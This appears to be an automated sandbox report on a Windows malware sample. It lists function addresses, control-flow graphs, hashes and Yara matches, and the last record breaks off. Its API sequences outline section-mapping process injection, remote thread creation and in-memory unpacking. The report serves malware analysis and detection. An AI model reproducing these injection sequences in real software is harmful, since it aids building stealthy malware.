                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1849680308.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_400000_jtruajj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Section$View$Create$DuplicateObject
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1546783058-0
                                                                                                                    • Opcode ID: bf712b81fe7c33e45fb91e121ae8a1411471c4f54e6f2b27f252d32f249b509c
                                                                                                                    • Instruction ID: 46ca3ae5353e1b2bf85c7e7487c0bf4a09c0837efea8bedcf4105f5ea6450319
                                                                                                                    • Opcode Fuzzy Hash: bf712b81fe7c33e45fb91e121ae8a1411471c4f54e6f2b27f252d32f249b509c
                                                                                                                    • Instruction Fuzzy Hash: 81512971900245BFEF209F91CC48FEB7BB8EF85B00F14416AF912BA1A5D6749945CB24
                                                                                                                    Function 00401541 Relevance: 10.7, APIs: 7, Instructions: 175nativeCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 313 401541-401543 315 401546-40157f call 4011a4 313->315 316 401539-40153f 313->316 326 401581 315->326 327 401584-401589 315->327 316->315 326->327 329 4018a6-4018ae 327->329 330 40158f-4015a0 327->330 329->327 333 4018a4-4018b3 330->333 334 4015a6-4015cf 330->334 336 4018c8 333->336 337 4018b9-4018c4 333->337 334->333 343 4015d5-4015ec NtDuplicateObject 334->343 336->337 339 4018cb-4018ff call 4011a4 336->339 337->339 343->333 344 4015f2-401616 NtCreateSection 343->344 346 401672-401698 NtCreateSection 344->346 347 401618-401639 NtMapViewOfSection 344->347 346->333 350 40169e-4016a2 346->350 347->346 349 40163b-401657 NtMapViewOfSection 347->349 349->346 352 401659-40166f 349->352 350->333 353 4016a8-4016c9 NtMapViewOfSection 350->353 352->346 353->333 355 4016cf-4016eb NtMapViewOfSection 353->355 355->333 358 4016f1 call 4016f6 355->358
                                                                                                                    APIs
                                                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1849680308.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_400000_jtruajj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Section$View$Create$DuplicateObject
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1546783058-0
                                                                                                                    • Opcode ID: fdd984ed4eabfdf3fe245d48b6addcc777c2a155290e4dc39758af1e8cc42314
                                                                                                                    • Instruction ID: 68c08b8250816e380b35483fe5a52fcf5a4ffa7bf922b91d474b11e8be87ed95
                                                                                                                    • Opcode Fuzzy Hash: fdd984ed4eabfdf3fe245d48b6addcc777c2a155290e4dc39758af1e8cc42314
                                                                                                                    • Instruction Fuzzy Hash: 99512AB1900205BFEF209F95CC48FEB7BB8EF85B10F14412AFA12BA1E5D6749945CB24
                                                                                                                    Function 00401545 Relevance: 10.7, APIs: 7, Instructions: 171nativeCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 361 401545-40157f call 4011a4 369 401581 361->369 370 401584-401589 361->370 369->370 372 4018a6-4018ae 370->372 373 40158f-4015a0 370->373 372->370 376 4018a4-4018b3 373->376 377 4015a6-4015cf 373->377 379 4018c8 376->379 380 4018b9-4018c4 376->380 377->376 386 4015d5-4015ec NtDuplicateObject 377->386 379->380 382 4018cb-4018ff call 4011a4 379->382 380->382 386->376 387 4015f2-401616 NtCreateSection 386->387 389 401672-401698 NtCreateSection 387->389 390 401618-401639 NtMapViewOfSection 387->390 389->376 393 40169e-4016a2 389->393 390->389 392 40163b-401657 NtMapViewOfSection 390->392 392->389 395 401659-40166f 392->395 393->376 396 4016a8-4016c9 NtMapViewOfSection 393->396 395->389 396->376 398 4016cf-4016eb NtMapViewOfSection 396->398 398->376 401 4016f1 call 4016f6 398->401
                                                                                                                    APIs
                                                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1849680308.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_400000_jtruajj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Section$View$Create$DuplicateObject
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1546783058-0
                                                                                                                    • Opcode ID: 9036e7d1caaa2f73f8ffe8f81ed6686f8338ecb8473fc941f507ff01140d436f
                                                                                                                    • Instruction ID: b5c9534ba5f5358dff2a074a80b826bd55324152c05987841a878028393b6fdb
                                                                                                                    • Opcode Fuzzy Hash: 9036e7d1caaa2f73f8ffe8f81ed6686f8338ecb8473fc941f507ff01140d436f
                                                                                                                    • Instruction Fuzzy Hash: 94513AB1900245BFEF209F95CC48FEF7BB8EF85B00F14415AF911BA2A5D6749945CB24
                                                                                                                    Function 00401553 Relevance: 10.7, APIs: 7, Instructions: 166nativeCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 404 401553-40157f call 4011a4 411 401581 404->411 412 401584-401589 404->412 411->412 414 4018a6-4018ae 412->414 415 40158f-4015a0 412->415 414->412 418 4018a4-4018b3 415->418 419 4015a6-4015cf 415->419 421 4018c8 418->421 422 4018b9-4018c4 418->422 419->418 428 4015d5-4015ec NtDuplicateObject 419->428 421->422 424 4018cb-4018ff call 4011a4 421->424 422->424 428->418 429 4015f2-401616 NtCreateSection 428->429 431 401672-401698 NtCreateSection 429->431 432 401618-401639 NtMapViewOfSection 429->432 431->418 435 40169e-4016a2 431->435 432->431 434 40163b-401657 NtMapViewOfSection 432->434 434->431 437 401659-40166f 434->437 435->418 438 4016a8-4016c9 NtMapViewOfSection 435->438 437->431 438->418 440 4016cf-4016eb NtMapViewOfSection 438->440 440->418 443 4016f1 call 4016f6 440->443
                                                                                                                    APIs
                                                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1849680308.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_400000_jtruajj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Section$View$Create$DuplicateObject
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1546783058-0
                                                                                                                    • Opcode ID: 7e7aa486a7cba38a24c4655809e077ce32b0d632fdebb8ad14eb01bbdf3cd026
                                                                                                                    • Instruction ID: 8d6641cc39e0a23de402a6cd7af9a8bcce9404ceaedab19c941a5a8b34b5f284
                                                                                                                    • Opcode Fuzzy Hash: 7e7aa486a7cba38a24c4655809e077ce32b0d632fdebb8ad14eb01bbdf3cd026
                                                                                                                    • Instruction Fuzzy Hash: 8C5119B1900205BFEF209F95CC48FEFBBB8EF85B00F14411AFA11AA2A5D6759945CB24
                                                                                                                    Function 00402FFA Relevance: 3.2, APIs: 2, Instructions: 168nativethreadCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 447 402ffa-40301e 448 403024-40303c 447->448 449 40313d-403142 447->449 448->449 450 403042-403053 448->450 451 403055-40305e 450->451 452 403063-403071 451->452 452->452 453 403073-40307a 452->453 454 40309c-4030a3 453->454 455 40307c-40309b 453->455 456 4030c5-4030c8 454->456 457 4030a5-4030c4 454->457 455->454 458 4030d1 456->458 459 4030ca-4030cd 456->459 457->456 458->451 461 4030d3-4030d8 458->461 459->458 460 4030cf 459->460 460->461 461->449 462 4030da-4030dd 461->462 462->449 463 4030df-40313a RtlCreateUserThread NtTerminateProcess 462->463 463->449
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1849680308.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_400000_jtruajj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateProcessTerminateThreadUser
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1921587553-0
                                                                                                                    • Opcode ID: be8e4cb5e493dd895ba0f666486257db29135dc3ef83a78b0b3b9a47898ca96e
                                                                                                                    • Instruction ID: 67905ead67b615cb9fd2ac39997d468ff33d28dd355ca5d175fe45067cf906e9
                                                                                                                    • Opcode Fuzzy Hash: be8e4cb5e493dd895ba0f666486257db29135dc3ef83a78b0b3b9a47898ca96e
                                                                                                                    • Instruction Fuzzy Hash: 8B414732618E0C4FD778EE6CA88966377D5E798351B1643AAD809D3389EE30D85183C5
                                                                                                                    Function 006A003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 134 6a003c-6a0047 135 6a0049 134->135 136 6a004c-6a0263 call 6a0a3f call 6a0e0f call 6a0d90 VirtualAlloc 134->136 135->136 151 6a028b-6a0292 136->151 152 6a0265-6a0289 call 6a0a69 136->152 154 6a02a1-6a02b0 151->154 156 6a02ce-6a03c2 VirtualProtect call 6a0cce call 6a0ce7 152->156 154->156 157 6a02b2-6a02cc 154->157 163 6a03d1-6a03e0 156->163 157->154 164 6a0439-6a04b8 VirtualFree 163->164 165 6a03e2-6a0437 call 6a0ce7 163->165 167 6a04be-6a04cd 164->167 168 6a05f4-6a05fe 164->168 165->163 170 6a04d3-6a04dd 167->170 171 6a077f-6a0789 168->171 172 6a0604-6a060d 168->172 170->168 174 6a04e3-6a0505 170->174 175 6a078b-6a07a3 171->175 176 6a07a6-6a07b0 171->176 172->171 177 6a0613-6a0637 172->177 188 6a0517-6a0520 174->188 189 6a0507-6a0515 174->189 175->176 179 6a086e-6a08be LoadLibraryA 176->179 180 6a07b6-6a07cb 176->180 178 6a063e-6a0648 177->178 178->171 181 6a064e-6a065a 178->181 187 6a08c7-6a08f9 179->187 183 6a07d2-6a07d5 180->183 181->171 186 6a0660-6a066a 181->186 184 6a07d7-6a07e0 183->184 185 6a0824-6a0833 183->185 191 6a07e2 184->191 192 6a07e4-6a0822 184->192 194 6a0839-6a083c 185->194 193 6a067a-6a0689 186->193 195 6a08fb-6a0901 187->195 196 6a0902-6a091d 187->196 190 6a0526-6a0547 188->190 189->190 197 6a054d-6a0550 190->197 191->185 192->183 198 6a068f-6a06b2 193->198 199 6a0750-6a077a 193->199 194->179 200 6a083e-6a0847 194->200 195->196 201 6a05e0-6a05ef 197->201 202 6a0556-6a056b 197->202 203 6a06ef-6a06fc 198->203 204 6a06b4-6a06ed 198->204 199->178 205 6a084b-6a086c 200->205 206 6a0849 200->206 201->170 208 6a056f-6a057a 202->208 209 6a056d 202->209 210 6a074b 203->210 211 6a06fe-6a0748 203->211 204->203 205->194 206->179 212 6a059b-6a05bb 208->212 213 6a057c-6a0599 208->213 209->201 210->193 211->210 218 6a05bd-6a05db 212->218 213->218 218->197
                                                                                                                    APIs
                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 006A024D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1849937727.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_6a0000_jtruajj.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocVirtual
                                                                                                                    • String ID: cess$kernel32.dll
                                                                                                                    • API String ID: 4275171209-1230238691
                                                                                                                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                    • Instruction ID: edfa6b35737d46774f892f9e838a511c53124eeea6e349ba935a860513cbf214
                                                                                                                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                    • Instruction Fuzzy Hash: 0A526874A01229DFDB64CF58C985BA8BBB1BF09304F1480D9E94DAB351DB30AE95DF14
                                                                                                                    Function 00418770 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63librarymemoryloaderCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 446 418770-4188b0 GetModuleHandleW GetProcAddress VirtualProtect
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00513D70), ref: 0041884F
                                                                                                                    • GetProcAddress.KERNEL32(00000000,0041E298), ref: 0041888C
                                                                                                                    • VirtualProtect.KERNELBASE(00513BB4,00513D6C,00000040,?), ref: 004188AB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1849711788.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_40b000_jtruajj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2099061454-3916222277
                                                                                                                    • Opcode ID: ff9a43801e185d10054e4e34767694ffcb7e86b2b941098a4c4c71e4807009e3
                                                                                                                    • Instruction ID: 2b977b853b8716191c274d39b2deee1532fc6552ce3022b0d9a41b083186e0cb
                                                                                                                    • Opcode Fuzzy Hash: ff9a43801e185d10054e4e34767694ffcb7e86b2b941098a4c4c71e4807009e3
                                                                                                                    • Instruction Fuzzy Hash: D8316F18508780CAE301DB79FC257823F6AAB75744F04D0ACD54C8B3B1D7BA5618E36E
                                                                                                                    Function 008408F7 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 464 8408f7-840910 465 840912-840914 464->465 466 840916 465->466 467 84091b-840927 CreateToolhelp32Snapshot 465->467 466->467 468 840937-840944 Module32First 467->468 469 840929-84092f 467->469 470 840946-840947 call 8405b6 468->470 471 84094d-840955 468->471 469->468 474 840931-840935 469->474 475 84094c 470->475 474->465 474->468 475->471
                                                                                                                    APIs
                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0084091F
                                                                                                                    • Module32First.KERNEL32(00000000,00000224), ref: 0084093F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1850164583.000000000083D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0083D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_83d000_jtruajj.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3833638111-0
                                                                                                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                    • Instruction ID: be5306d69ea61fbc5e9f7634e2c491a9b06848746d32d905b8ba5743e169b0e8
                                                                                                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                    • Instruction Fuzzy Hash: E8F0C231200318ABE7203AB9988DB6BBAE8FF48721F140529E742D51C1CB70EC058E61
                                                                                                                    Function 006A0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 477 6a0e0f-6a0e24 SetErrorMode * 2 478 6a0e2b-6a0e2c 477->478 479 6a0e26 477->479 479->478
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNELBASE(00000400,?,?,006A0223,?,?), ref: 006A0E19
                                                                                                                    • SetErrorMode.KERNELBASE(00000000,?,?,006A0223,?,?), ref: 006A0E1E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1849937727.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_6a0000_jtruajj.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2340568224-0
                                                                                                                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                    • Instruction ID: a812bd8a4e5226da291cda7890492f087020d928e330f1a56def5d4e73e5cff5
                                                                                                                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                    • Instruction Fuzzy Hash: 90D0123114512877DB003A94DC09BCD7B1CDF09B62F008451FB0DD9180C770994046E5
                                                                                                                    Function 0040190E Relevance: 1.3, APIs: 1, Instructions: 66sleepCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 498 40190e-40190f 499 401912-401963 call 4011a4 Sleep call 401426 498->499 500 4018b5-4018ff call 4011a4 498->500 523 401972-401978 499->523 524 401965-40196d call 401529 499->524 527 40198e 523->527 528 40197f-40198a 523->528 524->523 527->528 529 401991-4019bd call 4011a4 527->529 528->529
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                                      • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                      • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1849680308.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_400000_jtruajj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4152845823-0
                                                                                                                    • Opcode ID: 2faec9f74094ce0f08c74674007c6dc18df4c3c5133ab61c0808bb95c55d4a7d
                                                                                                                    • Instruction ID: c3efed824753038ef125f202698f45fd900918c8f6410fb3a7b527937a7c5fc5
                                                                                                                    • Opcode Fuzzy Hash: 2faec9f74094ce0f08c74674007c6dc18df4c3c5133ab61c0808bb95c55d4a7d
                                                                                                                    • Instruction Fuzzy Hash: D811BFB220C204EBEB00AA908C52EAA3754AF05710F248137BA42791F1C57D9A13F75B
                                                                                                                    Function 008405B6 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 537 8405b6-8405f0 call 8408c9 540 8405f2-840625 VirtualAlloc call 840643 537->540 541 84063e 537->541 543 84062a-84063c 540->543 541->541 543->541
                                                                                                                    APIs
                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00840607
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1850164583.000000000083D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0083D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_83d000_jtruajj.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4275171209-0
                                                                                                                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                    • Instruction ID: 9db1500acaea3910694f4b77489e2ecb119e3de9b1d077b6176067c5f6bc4e7d
                                                                                                                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                    • Instruction Fuzzy Hash: A0113F79A00208EFDB01DF98C985E99BBF5EF08350F058095FA489B361D771EA50DF91
                                                                                                                    Function 00401902 Relevance: 1.3, APIs: 1, Instructions: 47sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                                      • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                      • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1849680308.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_400000_jtruajj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4152845823-0
                                                                                                                    • Opcode ID: 038fd76a8208d0ddfff32e2f40036fbca87feb8e69a48f33ff6f35dc682cef07
                                                                                                                    • Instruction ID: 207861a3759c1b147de2553678edefd9187cc257709d93c52e233f88d5e7a3be
                                                                                                                    • Opcode Fuzzy Hash: 038fd76a8208d0ddfff32e2f40036fbca87feb8e69a48f33ff6f35dc682cef07
                                                                                                                    • Instruction Fuzzy Hash: B70169F1208209FBEB009A908D61EBA3668AB05760F700133BA13781F5D57C9A53E76B
                                                                                                                    Function 00401922 Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                                      • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                      • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1849680308.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_400000_jtruajj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4152845823-0
                                                                                                                    • Opcode ID: c88f444a594768d2d4fab485523800559cc166debe3a6fe30cf89bfb996ff5f6
                                                                                                                    • Instruction ID: 578df434b3d236032839297bc76fd9486bb072801922ad90ba2380d7086ecf03
                                                                                                                    • Opcode Fuzzy Hash: c88f444a594768d2d4fab485523800559cc166debe3a6fe30cf89bfb996ff5f6
                                                                                                                    • Instruction Fuzzy Hash: 95F05EB1208209FBEF009F908D61EAA3729AF05710F644137BA52781F5D63CDA53EB1B
                                                                                                                    Function 0040192B Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                                      • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                      • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1849680308.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_400000_jtruajj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4152845823-0
                                                                                                                    • Opcode ID: 45864dc147576a9e119c499a9794f12b744a0bfa5c226a532e69094f16d3b09b
                                                                                                                    • Instruction ID: b5d34a972f1ec939c421f577379ccf4d396b21f1793fd223155277739043cea6
                                                                                                                    • Opcode Fuzzy Hash: 45864dc147576a9e119c499a9794f12b744a0bfa5c226a532e69094f16d3b09b
                                                                                                                    • Instruction Fuzzy Hash: 5AF05EB1218209FBEB009F908D61EBA3629AF05310F644177BA12781F5C63DDA23E75B
                                                                                                                    Function 0040193C Relevance: 1.3, APIs: 1, Instructions: 31sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                                      • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                      • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1849680308.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_400000_jtruajj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4152845823-0
                                                                                                                    • Opcode ID: 14db16c3e861f19ad5dfd30c38be67768c01ca1c8fcdc6992631d9b2414dadb5
                                                                                                                    • Instruction ID: c277f467d3f9426b8f9a73765fdcab00a649fd51b95b24d53f0d4f33e3e8ae71
